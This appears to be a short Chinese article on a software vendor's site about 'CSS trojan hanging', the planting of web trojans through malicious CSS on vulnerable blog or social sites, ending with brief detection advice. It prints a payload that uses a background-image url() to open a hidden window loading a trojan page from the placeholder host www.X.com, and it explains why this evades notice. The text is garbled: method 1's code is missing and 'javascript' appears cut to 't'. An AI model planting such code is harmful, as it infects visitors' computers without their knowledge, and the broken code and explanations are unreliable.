旅游網(wǎng)站管理系統(tǒng)攻防CSS掛馬實(shí)錄

申請(qǐng)免費(fèi)試用、咨詢電話：400-8352-114

    旅游網(wǎng)站管理系統(tǒng)攻CSS掛馬方式較多，但主流的方式是通過(guò)有漏洞的博客或者SNS社交網(wǎng)站系統(tǒng)，將惡意的CSS代碼寫入支持CSS功能的個(gè)性化頁(yè)面中。下面我們以典型的CSS掛馬方式為例進(jìn)行講解。
    方式1：
    Body
    “background-image”在CSS中的主要功能是用來(lái)定義頁(yè)面的背景圖片。這是最典型的CSS掛馬方式，這段惡意代碼主要是通過(guò)“background-image”配合t代碼讓網(wǎng)頁(yè)木馬悄悄地在用戶的電腦中運(yùn)行。
    那如何將這段CSS惡意代碼掛到正常的網(wǎng)頁(yè)中去呢?黑客可以將生成好的網(wǎng)頁(yè)木馬放到自己指定的位置，然后將該段惡意代碼寫入掛馬網(wǎng)站的網(wǎng)頁(yè)中，或者掛馬網(wǎng)頁(yè)所調(diào)用的CSS文件中。
    小百科：
    使用Body對(duì)象元素，主要是為了讓對(duì)象不再改變整個(gè)網(wǎng)頁(yè)文檔的內(nèi)容，通過(guò)Body對(duì)象的控制，可以將內(nèi)容或者效果控制在指定的大小內(nèi)，如同使用DIV對(duì)象那樣精確地設(shè)置大小。
    方式2：
    Body
    background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
    方式1的CSS掛馬技術(shù)，在運(yùn)行時(shí)會(huì)出現(xiàn)空白的頁(yè)面，影響網(wǎng)頁(yè)訪問(wèn)者正常的訪問(wèn)，因此比較容易發(fā)現(xiàn)。不過(guò)在方式2中的這段代碼，使用了t的Open開(kāi)窗，通過(guò)新開(kāi)一個(gè)隱藏的窗口，在后臺(tái)悄悄地運(yùn)行新窗口并激活訪問(wèn)網(wǎng)頁(yè)溢出木馬頁(yè)面，不會(huì)影響訪問(wèn)者觀看網(wǎng)頁(yè)內(nèi)容，因此更加隱蔽。
    防網(wǎng)絡(luò)服務(wù)器被掛馬，通常會(huì)出現(xiàn)防病毒軟件告警之類的信息。由于漏洞不斷更新，掛馬種類時(shí)刻都在變換，通過(guò)客戶端的反映來(lái)發(fā)現(xiàn)服務(wù)器是否被掛馬往往疏漏較大。正確的做法是經(jīng)常檢查服務(wù)器日志，發(fā)現(xiàn)異常信息，經(jīng)常檢查網(wǎng)站代碼，使用網(wǎng)頁(yè)木馬檢測(cè)系統(tǒng)，進(jìn)行排查。